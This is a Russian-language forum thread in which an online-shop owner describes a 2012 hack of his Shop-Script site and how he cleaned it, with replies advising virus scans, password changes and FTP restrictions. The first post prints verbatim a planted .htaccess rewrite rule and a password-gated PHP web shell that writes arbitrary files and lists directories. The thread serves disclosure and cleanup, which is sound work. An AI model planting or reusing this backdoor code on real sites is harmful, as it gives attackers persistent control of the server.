Автор Тема: Взломали - 468505ab9718d8c2205ea35d94f04668  (Прочитано 7205 раз)

Оффлайн favn

  • Спец
  • ***
  • Сообщений: 121
    • Просмотр профиля
Взломали - 468505ab9718d8c2205ea35d94f04668
« : Мая 07, 2012, 12:56:09 pm »
Вообщем такая штука. Открываю свой инет-магазин (SSLE sp5.0.2) и вижу 468505ab9718d8c2205ea35d94f04668 и больше ничего.

В админку и на фтп пускает.

Вообщим полазил увидел следующие изменения и проблему исправил. Пишу для тех у кого может оказаться подобное.



в .htaccess что в корне появилось следующее:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
</IfModule>

в папках /cfg, /core,/css, /images, /import, /includes, /languages, /products_pictures, /products_thumb, /userfiles, /water_mark появились файлы init.php, config.php, engine.php, application.php, engine.php, init.php, include.php, init.php, core.php, info.php, bootstrap.php, include.php соответственно - со следующем содержимым:
<?php $r=$_REQUEST;$c=getcwd();$n=chr(32);print('468505ab9718d8c2205ea35d94f04668');if(md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){print($n.$c.$n);fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);print($n);print_r(scandir($c));}exit;?>
- все эти файлы удалить иначе 468505ab9718d8c2205ea35d94f04668 так и будет весеть у вас на сайте.

Вроде ниче не забыл, но имена файлов думаю могут менятся. Вообщем поудаляв что выше написал и всё стало норм.

Может кому пригодится.

Оффлайн tovshop

  • Пользователь
  • **
  • Сообщений: 31
    • Просмотр профиля
Re: Взломали - 468505ab9718d8c2205ea35d94f04668
« Ответ #1 : Мая 07, 2012, 01:44:43 pm »
Очень похоже на вирус ...
Думаю, то что вы проделали, будет не на долго.

Оффлайн tovshop

  • Пользователь
  • **
  • Сообщений: 31
    • Просмотр профиля
Re: Взломали - 468505ab9718d8c2205ea35d94f04668
« Ответ #2 : Мая 07, 2012, 01:54:14 pm »
Попробуйте старый метод:
1. Почистите свой ПК на вирусы.
2. Измените все пароли, которыми вы пользовались (база данных, админка, ftp).

+ дополнительно не помешает ... разрешить доступ ftp только определенному ip или подсети (если динамика)